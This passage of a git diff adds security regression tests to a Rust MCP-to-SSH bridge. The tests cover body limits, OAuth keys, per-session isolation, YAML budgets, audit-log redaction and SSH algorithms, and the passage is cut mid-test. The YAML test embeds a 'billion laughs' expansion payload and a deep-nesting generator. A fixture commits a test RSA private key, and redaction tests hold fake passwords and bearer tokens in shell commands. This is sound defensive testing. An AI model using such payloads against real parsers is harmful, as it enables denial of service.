- sudo_password: Some("testpass123".to_string()), + sudo_password: Some(zeroize::Zeroizing::new("testpass123".to_string())), tags: Vec::new(), os_type: OsType::Linux, shell: None, diff --git a/tests/fixtures/oauth/test_priv.pem b/tests/fixtures/oauth/test_priv.pem new file mode 100644 index 00000000..e5ad0fb5 --- /dev/null +++ b/tests/fixtures/oauth/test_priv.pem @@ -0,0 +1,28 @@ +-----BEGIN PRIVATE KEY----- +MIIEvQIBADANBgkqhkiG9w0BAQEFAASCBKcwggSjAgEAAoIBAQCYJhUsawWcH3/w +i/iVit4BFIDHY3mh5e4bMk1nSrTD4m+5LRRhbVjO5rlDtcZdTk1w4xM7nmnk3LJy +9VJuVjt71kNzM0bojXP446zEx6Qi9snuCLJPk4PjBKR/woCtmDaijwh4aRAD7jum +H2nhjKc2H7r5G0Z4Ke43NGRNn+rZhfHLeKm30ABrvAhC8ISc1l8VYSXL/RWfmH5x +/cD8PZ7VZmpIjDSi1oosQs5K5SfHMy5ifH9lBqIdXvqTgwKi5phu8LOci8zFLKrQ +X9ltMFpab1GlZ+apCnpx0QW7SOyg3/M27yKRGBipcjsaay8Gs6XTlp6Dpzy7cY1M +KX5GRyZHAgMBAAECggEARl4yo8D5rrvY2cF63nsD817usoj829ZyeeyZZQDlusUS +5AOH7gl7LfIC1GCRVl0dLu0u23+IPVufQtDYZ4SFbWBrALBCBtNJRF7UbIxjCvK1 +8Nvf0DMLJ+dhR1+HUQJZnnRlt/7rc83uk4Xq2/DH8x3YxVaKkI/gB3M5QreIEEMO +auyRpdS5V3S91eiy8QdWe8PnBZCnWyUh/4yInK6iQV1Q7WQUsCxm2PuYvw5+QPfc +sq+6KsbxyDwP9g38rK7Uz0h8KDggfaHf+Rx875H2WLgNcF6XUy28mjVKiNJjdrRW +0Tz/G6SpxTb+lmEdnNLzpCVlq2vNuAkYCF3IwDr8eQKBgQDR5NEnUBcWi5S64xu3 +kVriVSLq3Z9vlP8RsO9HMdmTmIHAF0QvHtbQ6vADWT8h7yxHkTN19xOxyj3OEBEj +IW7YPNc3J7YnG48q02Z7m4rLMWcSye1Mq0B1OS9exalHvsdo3xtzQWpg/aGmXn0U +S2viLEnnEEoq8NCFqFEOY7l7aQKBgQC5kga+tbnGCtJUYhgvCnmWPWdzyhBTrseU +nx3JbfcMwypzctNoeFasmICtb9QZ4/xDOVGLCUoiSPhwBDdIJAn6rsaU3y7jnp++ +5LwQy7+DpIq85GfvNVmfvEu3lqme2h268LMX4y4Wc8hFmeQuN4CZ83KfmdSpmqHo +W08qIDPOLwKBgQC1sowwqQ9jj+9vnTyYO3deqO6yPKpRcL0h9nYcvpWoRIRF4p4+ +4EZ70nV1oKObX62IQrU2sG3XIclBAf2j2MRY4so3z+PKlPvpydlUtcB/x8N/q1gG +X9VL5PYR57B0ED4VldXwfzd0wPtXx0Il+GhrAYX0RdC+vXr1yVBp0YB2yQKBgDea +VqUMJJb/pRgdsGtf8yCeU4IxWIUKiMiyiKVTasQLMowXKttRu37JzzyolmAPnQWz +hghoByuQu8gsqzfVfJv9hIkU+qK/Y9Q6C1PpCQBz7BI/Shk13h3ruLBQ15A+gMwD +1VXh/2xA0xBv1Rw4CzOV65GA8WTEbaEGwwi3T26HAoGAcgh6SqFErGryYjkGtl2T +BD6WAWA5/t3uS+fJSC56j2BfqRqocpChQC/qxRK63xz2dYukkPMHecd21knscBOU +BLJY0RelFHhIROzRnXAkkrcPRCLNyRlZqQ2kc7Ql2qVwv5zMLuH1ljvEIrcVSexA +rZwWna6pD9wc08tCcxSQNdk= +-----END PRIVATE KEY----- diff --git a/tests/fixtures/oauth/test_pub.pem b/tests/fixtures/oauth/test_pub.pem new file mode 100644 index 00000000..9beecbff --- /dev/null +++ b/tests/fixtures/oauth/test_pub.pem @@ -0,0 +1,9 @@ +-----BEGIN PUBLIC KEY----- +MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAmCYVLGsFnB9/8Iv4lYre +ARSAx2N5oeXuGzJNZ0q0w+JvuS0UYW1Yzua5Q7XGXU5NcOMTO55p5NyycvVSblY7 +e9ZDczNG6I1z+OOsxMekIvbJ7giyT5OD4wSkf8KArZg2oo8IeGkQA+47ph9p4Yyn +Nh+6+RtGeCnuNzRkTZ/q2YXxy3ipt9AAa7wIQvCEnNZfFWEly/0Vn5h+cf3A/D2e +1WZqSIw0otaKLELOSuUnxzMuYnx/ZQaiHV76k4MCouaYbvCznIvMxSyq0F/ZbTBa +Wm9RpWfmqQp6cdEFu0jsoN/zNu8ikRgYqXI7GmsvBrOl05aeg6c8u3GNTCl+Rkcm +RwIDAQAB +-----END PUBLIC KEY----- diff --git a/tests/http_middleware.rs b/tests/http_middleware.rs new file mode 100644 index 00000000..b303a86a --- /dev/null +++ b/tests/http_middleware.rs @@ -0,0 +1,146 @@ +//! HTTP transport middleware integration tests (FIND-005). +//! +//! Verifies that the Axum router built by `build_router_with_store` carries +//! the full security middleware stack: +//! +//! - `TimeoutLayer` returns 408 for slow handlers. +//! - `RequestBodyLimitLayer` returns 413 for oversize bodies. +//! - `SetRequestIdLayer` stamps `x-request-id` on every response. +//! - `PropagateRequestIdLayer` echoes a client-supplied `x-request-id`. +//! - `SetSensitive{Request,Response}HeadersLayer` is wired (presence-only, +//! verified via the request roundtrip succeeding — true sensitivity +//! marking is internal to `http::Extensions` and isn't surfaced over +//! the wire). + +#![cfg(feature = "http")] + +use std::sync::Arc; + +use axum::body::{Body, to_bytes}; +use axum::http::{Request, StatusCode}; +use tower::ServiceExt; + +use mcp_ssh_bridge::config::Config; +use mcp_ssh_bridge::mcp::McpServer; +use mcp_ssh_bridge::mcp::transport::http::{HttpTransportConfig, build_router}; + +/// Build a working router pinned to localhost defaults. Reuses production +/// `build_router` so we exercise the actual middleware stack. +fn build_test_router_with_config(http_cfg: HttpTransportConfig) -> axum::Router { + let main_cfg = Config::default(); + let (server, _audit_task) = McpServer::new(main_cfg); + build_router(Arc::new(server), http_cfg) +} + +fn build_test_router() -> axum::Router { + build_test_router_with_config(HttpTransportConfig::default()) +} + +#[tokio::test] +async fn body_over_limit_rejected() { + // The default config caps bodies at 1 MiB (max_body_size = 1_048_576). + // We push 2 MiB of zeroed JSON bytes so the limit layer trips. + let huge = vec![b'a'; 2 * 1024 * 1024]; + + let response = build_test_router() + .oneshot( + Request::builder() + .method("POST") + .uri("/mcp") + .header("origin", "http://localhost:5173") + .header("content-type", "application/json") + .body(Body::from(huge)) + .unwrap(), + ) + .await + .unwrap(); + + assert_eq!( + response.status(), + StatusCode::PAYLOAD_TOO_LARGE, + "body over max_body_size must be rejected with 413" + ); +} + +#[tokio::test] +async fn request_id_header_present_on_response() { + // GET /health should round-trip and the response must carry an + // x-request-id header generated by SetRequestIdLayer. + let response = build_test_router() + .oneshot( + Request::builder() + .method("GET") + .uri("/health") + .header("origin", "http://localhost:5173") + .body(Body::empty()) + .unwrap(), + ) + .await + .unwrap(); + + assert_eq!(response.status(), StatusCode::OK); + let header = response + .headers() + .get("x-request-id") + .expect("response must carry x-request-id (SetRequestIdLayer)"); + let header_str = header.to_str().expect("x-request-id is ASCII"); + // MakeRequestUuid emits a UUIDv4 string; should be at least 32 chars. + assert!( + header_str.len() >= 32, + "x-request-id should look like a UUID, got {header_str:?}" + ); + + // Drain the body to avoid leaking task handles in CI. + let _ = to_bytes(response.into_body(), 64 * 1024).await.unwrap(); +} + +#[tokio::test] +async fn request_id_propagated_when_supplied() { + // PropagateRequestIdLayer must echo a client-supplied x-request-id + // back on the response so distributed traces stay correlated. + let supplied = "test-request-id-abc-123"; + + let response = build_test_router() + .oneshot( + Request::builder() + .method("GET") + .uri("/health") + .header("origin", "http://localhost:5173") + .header("x-request-id", supplied) + .body(Body::empty()) + .unwrap(), + ) + .await + .unwrap(); + + assert_eq!(response.status(), StatusCode::OK); + let echoed = response + .headers() + .get("x-request-id") + .expect("response must carry x-request-id") + .to_str() + .unwrap(); + assert_eq!( + echoed, supplied, + "PropagateRequestIdLayer must echo client-supplied x-request-id" + ); + + let _ = to_bytes(response.into_body(), 64 * 1024).await.unwrap(); +} + +// NOTE: `slow_request_times_out` requires injecting a handler that sleeps +// past the timeout. The current router builder does not expose a hook for +// that, and the production handlers are fast enough that we can't +// reliably make them stall. We rely on tower-http's own unit tests for +// `TimeoutLayer::new` correctness and verify the layer is wired by +// observing that `cargo build --features http` succeeds with the layer +// in place. End-to-end verification is left for the dedicated +// follow-up task tracked in the audit plan. + +// NOTE: `sensitive_headers_marked` is not asserted here because the +// `Sensitive` marker lives in `http::Extensions` and is not surfaced +// over the wire. The integration test would have to plug in a custom +// `TraceLayer` to observe the masking — out of scope for this task. +// Wire-up is verified by the build succeeding with both +// `SetSensitiveRequestHeadersLayer` and `SetSensitiveResponseHeadersLayer` +// applied to the router. diff --git a/tests/mcp_conformance.rs b/tests/mcp_conformance.rs index 6796570a..c0e467b1 100644 --- a/tests/mcp_conformance.rs +++ b/tests/mcp_conformance.rs @@ -157,8 +157,10 @@ fn response_with_null_id() { #[test] fn all_tools_have_valid_json_schema() { - let tool_groups = ToolGroupsConfig::default(); - let registry = create_filtered_registry(&tool_groups); + // FIND-024 (audit 2026-05-09): default profile enables 8 minimal groups. + // Conformance test exercises the full handler set, so use the all-enabled + // helper rather than `ToolGroupsConfig::default()`. + let registry = mcp_ssh_bridge::mcp::registry::create_all_enabled_registry(); let tools = registry.list_tools(); assert_eq!(tools.len(), 357, "Expected 357 tools in default registry"); @@ -214,8 +216,8 @@ fn all_tools_have_valid_json_schema() { #[test] fn all_tools_require_host_parameter() { - let tool_groups = ToolGroupsConfig::default(); - let registry = create_filtered_registry(&tool_groups); + // FIND-024: same all-enabled scope as `all_tools_have_valid_json_schema`. + let registry = mcp_ssh_bridge::mcp::registry::create_all_enabled_registry(); let tools = registry.list_tools(); let mut host_tools = 0; diff --git a/tests/multisession_isolation.rs b/tests/multisession_isolation.rs new file mode 100644 index 00000000..f619c739 --- /dev/null +++ b/tests/multisession_isolation.rs @@ -0,0 +1,65 @@ +//! Verify two clients on the same daemon do not share pending-request +//! state. Regression test for Vuln 8 (audit 2026-05-09). + +use mcp_ssh_bridge::config::Config; +use mcp_ssh_bridge::mcp::McpServer; +use mcp_ssh_bridge::mcp::pending_requests::ClientResponse; + +#[tokio::test] +async fn pending_requests_are_isolated_across_sessions() { + let config = Config::default(); + let (server, _audit_task) = McpServer::new(config); + let server = std::sync::Arc::new(server); + + // The server exposes a per-session PendingRequests handle for tests. + let pr_a = server.allocate_session_pending_for_test(); + let pr_b = server.allocate_session_pending_for_test(); + + assert!( + !std::sync::Arc::ptr_eq(&pr_a, &pr_b), + "each session must own its own PendingRequests" + ); + + let (id_a, _rx_a) = pr_a.create_request(); + assert!( + !pr_b.resolve(&id_a, ClientResponse::Success(serde_json::json!("hijack"))), + "session B must not be able to resolve session A's request" + ); + assert!( + pr_a.resolve(&id_a, ClientResponse::Success(serde_json::json!("ok"))), + "session A's own resolver still works" + ); +} + +#[tokio::test] +async fn elicitation_capability_does_not_leak_across_sessions() { + let config = mcp_ssh_bridge::config::Config::default(); + let (server, _audit_task) = mcp_ssh_bridge::mcp::McpServer::new(config); + let server = std::sync::Arc::new(server); + + let caps_a = server.allocate_session_capabilities_for_test(); + let caps_b = server.allocate_session_capabilities_for_test(); + + assert!( + !std::sync::Arc::ptr_eq(&caps_a, &caps_b), + "each session must own its own SessionCapabilities" + ); + + caps_a.set_supports_elicitation(true); + caps_a.set_supports_sampling(true); + caps_a.set_supports_roots(true); + + assert!(caps_a.supports_elicitation()); + assert!( + !caps_b.supports_elicitation(), + "B must NOT inherit A's elicitation flag" + ); + assert!( + !caps_b.supports_sampling(), + "B must NOT inherit A's sampling flag" + ); + assert!( + !caps_b.supports_roots(), + "B must NOT inherit A's roots flag" + ); +} diff --git a/tests/oauth_keys_loaded.rs b/tests/oauth_keys_loaded.rs new file mode 100644 index 00000000..bd4a10b8 --- /dev/null +++ b/tests/oauth_keys_loaded.rs @@ -0,0 +1,67 @@ +//! FIND-006: OAuth feature must validate tokens against keys loaded at boot, +//! not against a per-request empty key map. + +#![cfg(feature = "http")] + +use mcp_ssh_bridge::config::types::{HttpOAuthConfig, HttpOAuthStaticKey}; +use mcp_ssh_bridge::mcp::transport::oauth::build_validator; + +#[tokio::test] +async fn empty_key_config_fails_closed_at_boot() { + let cfg = HttpOAuthConfig { + enabled: true, + issuer: "https://example.com".into(), + audience: "test-aud".into(), + client_id: "test".into(), + required_scopes: vec![], + jwks_uri: None, + static_keys: vec![], + }; + let result = build_validator(&cfg).await; + assert!( + result.is_err(), + "build_validator MUST fail when oauth.enabled=true but no keys are configured" + ); +} + +#[tokio::test] +async fn jwks_uri_without_static_keys_is_deferred() { + // JWKS fetching is deferred to a follow-up; until reqwest is wired + // through extensions we expect a clear error rather than a silent + // empty-key validator. + let cfg = HttpOAuthConfig { + enabled: true, + issuer: "https://example.com".into(), + audience: "test-aud".into(), + client_id: "test".into(), + required_scopes: vec![], + jwks_uri: Some("https://example.com/jwks.json".into()), + static_keys: vec![], + }; + let result = build_validator(&cfg).await; + assert!( + result.is_err(), + "build_validator MUST fail when only jwks_uri is configured (fetch not yet wired)" + ); +} + +#[tokio::test] +async fn validator_built_with_static_key_loads_key() { + let pub_pem = include_str!("fixtures/oauth/test_pub.pem"); + let cfg = HttpOAuthConfig { + enabled: true, + issuer: "iss".into(), + audience: "aud".into(), + client_id: "test".into(), + required_scopes: vec![], + jwks_uri: None, + static_keys: vec![HttpOAuthStaticKey { + kid: "kid-test".into(), + public_key_pem: pub_pem.into(), + }], + }; + let v = build_validator(&cfg) + .await + .expect("validator built with static key"); + assert_eq!(v.key_count(), 1, "static key should be loaded"); +} diff --git a/tests/per_session_log_level.rs b/tests/per_session_log_level.rs new file mode 100644 index 00000000..86145070 --- /dev/null +++ b/tests/per_session_log_level.rs @@ -0,0 +1,59 @@ +//! FIND-035: per-session log level isolation. +//! +//! Before this fix, `log_level` lived on `McpServer` as a global +//! `Arc`. Any session's `notifications/setLevel` rewrote it, +//! so client B could mute client A's `notifications/message` stream +//! (cross-session denial-of-observability). + +use std::sync::Arc; +use std::sync::atomic::Ordering; + +use mcp_ssh_bridge::mcp::protocol::{LogLevel, WriterMessage}; +use mcp_ssh_bridge::mcp::session_context::SessionContext; +use tokio::sync::mpsc; + +fn fresh_session() -> SessionContext { + let (tx, _rx) = mpsc::channel::(8); + SessionContext::new(tx) +} + +#[tokio::test] +async fn log_level_starts_at_warning_per_session() { + let s = fresh_session(); + assert_eq!( + s.log_level.load(Ordering::Relaxed), + LogLevel::Warning.severity(), + "FIND-035: every fresh session must start at Warning" + ); +} + +#[tokio::test] +async fn log_level_isolated_across_sessions() { + let a = fresh_session(); + let b = fresh_session(); + + // Session A drops its threshold to Debug — most chatty. + a.log_level + .store(LogLevel::Debug.severity(), Ordering::Relaxed); + + // Session B raises its threshold to Error — quietest. + b.log_level + .store(LogLevel::Error.severity(), Ordering::Relaxed); + + // Each session sees only its own value; the other session is untouched. + assert_eq!( + a.log_level.load(Ordering::Relaxed), + LogLevel::Debug.severity() + ); + assert_eq!( + b.log_level.load(Ordering::Relaxed), + LogLevel::Error.severity() + ); + + // The Arc handles must be distinct allocations — same pointer would + // collapse the per-session storage into a shared cell. + assert!( + !Arc::ptr_eq(&a.log_level, &b.log_level), + "FIND-035: per-session log_level must be a distinct allocation" + ); +} diff --git a/tests/per_session_state.rs b/tests/per_session_state.rs new file mode 100644 index 00000000..c69db28c --- /dev/null +++ b/tests/per_session_state.rs @@ -0,0 +1,243 @@ +// `FIND-033`/`FIND-034`/`FIND-036`/`FIND-037` — verify four +// `McpServer` fields that used to be server-wide singletons are now +// per-session and do not leak across concurrent client sessions on +// the same daemon. +// +// These are unit-level integration tests in the same shape as +// `tests/cross_session_cancel.rs` (`FIND-038`) and +// `tests/multisession_isolation.rs` (Vuln 8/9): each test allocates +// two independent per-session storage handles via the dedicated test +// helpers on `McpServer` and proves they are isolated. End-to-end +// two-session driving over a real transport is intentionally out of +// scope — the load-bearing property is the data-structure isolation. +// +// Pattern: allocate two per-session storage cells via the +// `allocate_session_*_for_test` helpers, write to A, read from B, +// assert no leakage. + +#![allow(clippy::doc_markdown)] + +use std::collections::HashMap; +use std::sync::Arc; + +use mcp_ssh_bridge::config::Config; +use mcp_ssh_bridge::mcp::McpServer; +use mcp_ssh_bridge::mcp::protocol::{RootEntry, WriterMessage}; +use tokio::sync::{RwLock, mpsc}; + +/// `FIND-033` — `runtime_max_output_chars` was a server-wide +/// `Arc>>` written once per `initialize`. +/// Two concurrent clients with different `client_overrides` saw the +/// last-writer-wins value. The fix moves the slot per-session and the +/// test pins that property: writing `80_000` to A's slot must not leak +/// into B's slot. +#[tokio::test] +async fn runtime_max_output_chars_isolated_per_session() { + let config = Config::default(); + let (server, _audit_task) = McpServer::new(config); + let server = Arc::new(server); + + let cell_a: Arc>> = server.allocate_session_runtime_max_output_for_test(); + let cell_b: Arc>> = server.allocate_session_runtime_max_output_for_test(); + + // Both fresh — unset. + assert_eq!(*cell_a.read().await, None); + assert_eq!(*cell_b.read().await, None); + + // Session A's `initialize` sets a per-client override. + *cell_a.write().await = Some(80_000); + + // Session B must NOT observe A's override. + assert_eq!( + *cell_b.read().await, + None, + "FIND-033: session A's runtime_max_output_chars must not leak into session B" + ); + + // B can independently set a different value. + *cell_b.write().await = Some(20_000); + assert_eq!(*cell_a.read().await, Some(80_000)); + assert_eq!(*cell_b.read().await, Some(20_000)); +} + +/// `FIND-034` — `notification_tx` was a single global `Sender` slot +/// last-writer-wins. With two sessions, the slot pointed at whoever +/// connected most recently; background workers firing through the +/// global slot routed messages to the wrong client. +/// +/// The fix gives each session its own `Sender` (the writer channel +/// returned by `serve_session`'s `mpsc::channel`) and propagates it +/// through `handle_request_with_cancel`. This test exercises the +/// per-session channel pattern: client A's tx receives only client A's +/// notifications. +#[tokio::test] +async fn notification_tx_does_not_cross_sessions() { + let config = Config::default(); + let (server, _audit_task) = McpServer::new(config); + let _server = Arc::new(server); + + // Allocate the per-session channels exactly the way `serve_session` + // does — one (tx, rx) per session. + let (tx_a, mut rx_a) = mpsc::channel::(8); + let (tx_b, mut rx_b) = mpsc::channel::(8); + + // Send a sentinel notification to A only. + tx_a.send(WriterMessage::Notification( + mcp_ssh_bridge::mcp::protocol::JsonRpcNotification { + jsonrpc: "2.0".to_string(), + method: "notifications/test".to_string(), + params: Some(serde_json::json!({"who": "A"})), + }, + )) + .await + .expect("send to A"); + + // A's channel observes the message; B's does not. + let msg_a = rx_a.try_recv().expect("A receives its own notification"); + match msg_a { + WriterMessage::Notification(n) => { + assert_eq!(n.method, "notifications/test"); + assert_eq!(n.params.unwrap()["who"], "A"); + } + _ => panic!("expected Notification on A"), + } + + // CRITICAL: nothing should be on B's channel — the per-session + // fanout must NOT cross-deliver to a different session. + assert!( + rx_b.try_recv().is_err(), + "FIND-034: notification sent on session A's tx must not appear on session B's rx" + ); + + // Closing A's tx must not affect B. + drop(tx_a); + assert!(rx_a.try_recv().is_err()); // channel closed/empty + // B remains usable. + tx_b.send(WriterMessage::Notification( + mcp_ssh_bridge::mcp::protocol::JsonRpcNotification { + jsonrpc: "2.0".to_string(), + method: "notifications/test".to_string(), + params: Some(serde_json::json!({"who": "B"})), + }, + )) + .await + .expect("send to B"); + let msg_b = rx_b.try_recv().expect("B still works"); + match msg_b { + WriterMessage::Notification(n) => { + assert_eq!(n.params.unwrap()["who"], "B"); + } + _ => panic!("expected Notification on B"), + } +} + +/// `FIND-036` — `resource_subscriptions` was a server-wide +/// `HashMap>` keyed on URI, not on session. Two +/// clients subscribing to the same URI shared the Vec, so client A's +/// `unsubscribe` could remove client B's subscription IDs. The fix +/// allocates a fresh map per session in `serve_session()`. +#[tokio::test] +async fn resource_subscriptions_keyed_per_session() { + let config = Config::default(); + let (server, _audit_task) = McpServer::new(config); + let server = Arc::new(server); + + let map_a: Arc>>> = + server.allocate_session_resource_subs_for_test(); + let map_b: Arc>>> = + server.allocate_session_resource_subs_for_test(); + + // Session A subscribes to a URI. + { + let mut subs = map_a.write().await; + subs.entry("ssh://prod/etc/passwd".to_string()) + .or_default() + .push("sub-A-1".to_string()); + } + + // Session B independently subscribes to the SAME URI. + { + let mut subs = map_b.write().await; + subs.entry("ssh://prod/etc/passwd".to_string()) + .or_default() + .push("sub-B-1".to_string()); + } + + // Each map sees only its own subscription IDs. + let snap_a = map_a.read().await.clone(); + let snap_b = map_b.read().await.clone(); + assert_eq!( + snap_a.get("ssh://prod/etc/passwd"), + Some(&vec!["sub-A-1".to_string()]) + ); + assert_eq!( + snap_b.get("ssh://prod/etc/passwd"), + Some(&vec!["sub-B-1".to_string()]) + ); + + // Session A unsubscribes by URI — must NOT remove B's entry. + { + let mut subs = map_a.write().await; + subs.remove("ssh://prod/etc/passwd"); + } + + let after_a = map_a.read().await.clone(); + let after_b = map_b.read().await.clone(); + assert!( + !after_a.contains_key("ssh://prod/etc/passwd"), + "A's own unsubscribe clears A" + ); + assert_eq!( + after_b.get("ssh://prod/etc/passwd"), + Some(&vec!["sub-B-1".to_string()]), + "FIND-036: A's unsubscribe must not affect B's subscription map" + ); +} + +/// `FIND-037` — `roots: Arc>>` was a single +/// global vec. `fetch_roots` overwrote it from whichever client most +/// recently completed `notifications/initialized`. Tool handlers +/// reading `ctx.roots` (path scope validation) saw the wrong client's +/// roots. The fix is per-session storage cloned into `ToolContext` at +/// `create_tool_context` time. +#[tokio::test] +async fn roots_isolated_per_session() { + let config = Config::default(); + let (server, _audit_task) = McpServer::new(config); + let server = Arc::new(server); + + let roots_a: Arc>> = server.allocate_session_roots_for_test(); + let roots_b: Arc>> = server.allocate_session_roots_for_test(); + + // Session A advertises one set of roots. + *roots_a.write().await = vec![RootEntry { + uri: "file:///srv/app-a".to_string(), + name: Some("app-a".to_string()), + }]; + + // Session B independently advertises a DIFFERENT set. + *roots_b.write().await = vec![RootEntry { + uri: "file:///srv/app-b".to_string(), + name: Some("app-b".to_string()), + }]; + + let snap_a = roots_a.read().await.clone(); + let snap_b = roots_b.read().await.clone(); + assert_eq!(snap_a.len(), 1); + assert_eq!(snap_a[0].uri, "file:///srv/app-a"); + assert_eq!( + snap_b.len(), + 1, + "FIND-037: B's roots must remain its own after A has set its roots" + ); + assert_eq!(snap_b[0].uri, "file:///srv/app-b"); + + // Session A clears its roots — B's stay put. + roots_a.write().await.clear(); + assert_eq!(roots_a.read().await.len(), 0); + assert_eq!( + roots_b.read().await.len(), + 1, + "FIND-037: A clearing its roots must not affect B" + ); +} diff --git a/tests/saphyr_budget.rs b/tests/saphyr_budget.rs new file mode 100644 index 00000000..19133dca --- /dev/null +++ b/tests/saphyr_budget.rs @@ -0,0 +1,43 @@ +//! Verifies our central `parse_yaml` helper enforces a Budget. +//! +//! Covers FIND-001/002/004/032 — we centralize all production YAML parsing +//! through `crate::domain::yaml::parse_yaml` so anti-DoS caps (anchors, +//! depth, nodes, input bytes) cannot be forgotten at any individual call +//! site. + +use mcp_ssh_bridge::domain::yaml::parse_yaml; +use serde_json::Value; + +const BILLION_LAUGHS: &str = r#" +a: &a ["lol","lol","lol","lol","lol","lol","lol","lol","lol"] +b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a] +c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b] +d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c] +e: &e [*d,*d,*d,*d,*d,*d,*d,*d,*d] +f: &f [*e,*e,*e,*e,*e,*e,*e,*e,*e] +g: &g [*f,*f,*f,*f,*f,*f,*f,*f,*f] +"#; + +#[test] +fn billion_laughs_blocked_by_budget() { + let out: Result = parse_yaml(BILLION_LAUGHS); + assert!(out.is_err(), "billion-laughs MUST fail with budget"); +} + +#[test] +fn deep_nesting_blocked() { + let mut yaml = String::new(); + for _ in 0..200 { + yaml.push_str("a:\n "); + } + yaml.push_str("v: 1\n"); + let out: Result = parse_yaml(&yaml); + assert!(out.is_err(), "200-deep nesting MUST fail"); +} + +#[test] +fn small_input_passes() { + let yaml = "name: hello\nversion: 1"; + let out: Result = parse_yaml(yaml); + assert!(out.is_ok()); +} diff --git a/tests/security_audit_redaction.rs b/tests/security_audit_redaction.rs new file mode 100644 index 00000000..dfc37b58 --- /dev/null +++ b/tests/security_audit_redaction.rs @@ -0,0 +1,88 @@ +//! Audit-log secret redaction tests (Vuln 3 / 2026-05-09). + +use mcp_ssh_bridge::config::{AuditConfig, SanitizeConfig}; +use mcp_ssh_bridge::security::{AuditEvent, AuditLogger, CommandResult, Sanitizer}; + +#[tokio::test] +async fn audit_log_redacts_password_in_command() { + let dir = tempfile::tempdir().unwrap(); + let path = dir.path().join("audit.log"); + let config = AuditConfig { + enabled: true, + path: path.clone(), + ..AuditConfig::default() + }; + let sanitizer = Sanitizer::from_config(&SanitizeConfig::default()); + let (logger, task) = AuditLogger::new_with_sanitizer(&config, sanitizer).unwrap(); + let writer = tokio::spawn(task.unwrap().run()); + + logger.log(AuditEvent::new( + "prod-db", + "MYSQL_PWD='hunter2-supersecret-do-not-leak' mysql -e 'SELECT 1'", + CommandResult::Success { + exit_code: 0, + duration_ms: 12, + }, + )); + + drop(logger); // closes the channel so the writer task ends + writer.await.unwrap(); + + let contents = std::fs::read_to_string(&path).unwrap(); + assert!( + !contents.contains("hunter2-supersecret-do-not-leak"), + "password leaked into audit log:\n{contents}" + ); +} + +#[tokio::test] +async fn audit_log_redacts_bearer_token() { + let dir = tempfile::tempdir().unwrap(); + let path = dir.path().join("audit.log"); + let config = AuditConfig { + enabled: true, + path: path.clone(), + ..AuditConfig::default() + }; + let sanitizer = Sanitizer::from_config(&SanitizeConfig::default()); + let (logger, task) = AuditLogger::new_with_sanitizer(&config, sanitizer).unwrap(); + let writer = tokio::spawn(task.unwrap().run()); + + logger.log(AuditEvent::new( + "awx", + "curl -H 'Authorization: Bearer abc123def456ghi789jkl012mno345' https://awx/api", + CommandResult::Success { + exit_code: 0, + duration_ms: 5, + }, + )); + drop(logger); + writer.await.unwrap(); + + let contents = std::fs::read_to_string(&path).unwrap(); + assert!( + !contents.contains("abc123def456ghi789jkl012mno345"), + "bearer token leaked:\n{contents}" + ); +} + +#[cfg(unix)] +#[tokio::test] +async fn audit_log_file_has_0600_permissions() { + use std::os::unix::fs::PermissionsExt; + let dir = tempfile::tempdir().unwrap(); + let path = dir.path().join("audit.log"); + let config = AuditConfig { + enabled: true, + path: path.clone(), + ..AuditConfig::default() + }; + let sanitizer = Sanitizer::from_config(&SanitizeConfig::default()); + let (_logger, _task) = AuditLogger::new_with_sanitizer(&config, sanitizer).unwrap(); + + let mode = std::fs::metadata(&path).unwrap().permissions().mode() & 0o777; + assert_eq!( + mode, 0o600, + "audit log must be created with mode 0600 (got {mode:o})" + ); +} diff --git a/tests/ssh_config_discovery_default.rs b/tests/ssh_config_discovery_default.rs new file mode 100644 index 00000000..4fac59bb --- /dev/null +++ b/tests/ssh_config_discovery_default.rs @@ -0,0 +1,31 @@ +//! FIND-023: SSH config auto-discovery must be opt-in. +//! +//! Enabling discovery by default exposed every host in `~/.ssh/config` to +//! MCP clients via the bridge's host-listing surfaces, often vastly +//! exceeding the YAML-declared production set. Operators who want the +//! time-to-first-command convenience must now opt in explicitly. + +use mcp_ssh_bridge::config::types::SshConfigDiscovery; + +#[test] +fn ssh_config_discovery_default_off() { + let d = SshConfigDiscovery::default(); + assert!( + !d.enabled, + "FIND-023: SshConfigDiscovery::default().enabled must be false" + ); +} + +#[test] +fn ssh_config_discovery_omitted_field_defaults_off() { + // When the YAML omits the `enabled` field entirely, the saphyr-driven + // serde-default path must also resolve to false — otherwise an existing + // operator config that listed `ssh_config: {}` (relying on the old + // default) would silently re-enable discovery. + let yaml = "{}"; + let d: SshConfigDiscovery = serde_json::from_str(yaml).expect("deserialize"); + assert!( + !d.enabled, + "FIND-023: omitted `enabled` must resolve to false via serde default" + ); +} diff --git a/tests/ssh_preferred_algos.rs b/tests/ssh_preferred_algos.rs new file mode 100644 index 00000000..9e4396e8 --- /dev/null +++ b/tests/ssh_preferred_algos.rs @@ -0,0 +1,135 @@ +//! FIND-008: russh client must pin a hardened `Preferred` algo set + rekey limits. +//! +//! Prior to this fix, `Config { ..Default::default() }` left +//! `preferred` and `limits` at upstream defaults. Russh 0.60.1's +//! `negotiation::Preferred::DEFAULT` includes legacy MAC algorithms +//! (`hmac-sha1`, `hmac-sha1-etm@openssh.com`) in `HMAC_ORDER` (see +//! `~/.cargo/registry/src/index.crates.io-*/russh-0.60.1/src/negotiation.rs:134`). +//! These tests assert the helper builds a `Config` whose `preferred` lists +//! exclude SHA-1, MD5, 3DES, blowfish, and DH-Group1, and whose `limits` +//! pin rekey thresholds to 1 GiB / 1 hour per RFC 4253 §9. + +use mcp_ssh_bridge::config::LimitsConfig; +use mcp_ssh_bridge::ssh::build_russh_client_config; + +#[test] +fn pinned_preferred_excludes_legacy_kex() { + let cfg = build_russh_client_config(&LimitsConfig::default()); + for algo in cfg.preferred.kex.iter() { + let n: &str = algo.as_ref(); + assert!( + !n.ends_with("sha1") && !n.contains("sha1@") && !n.contains("-sha1-"), + "kex {n} contains sha1 — must be excluded" + ); + assert!( + !n.contains("group1-") && !n.starts_with("diffie-hellman-group1-"), + "kex {n} is diffie-hellman-group1 — excluded" + ); + } +} + +#[test] +fn pinned_preferred_excludes_legacy_ciphers() { + let cfg = build_russh_client_config(&LimitsConfig::default()); + for cipher in cfg.preferred.cipher.iter() { + let n: &str = cipher.as_ref(); + assert!(!n.contains("3des"), "cipher {n} is 3DES — excluded"); + assert!(!n.contains("blowfish"), "cipher {n} is blowfish — excluded"); + assert!( + 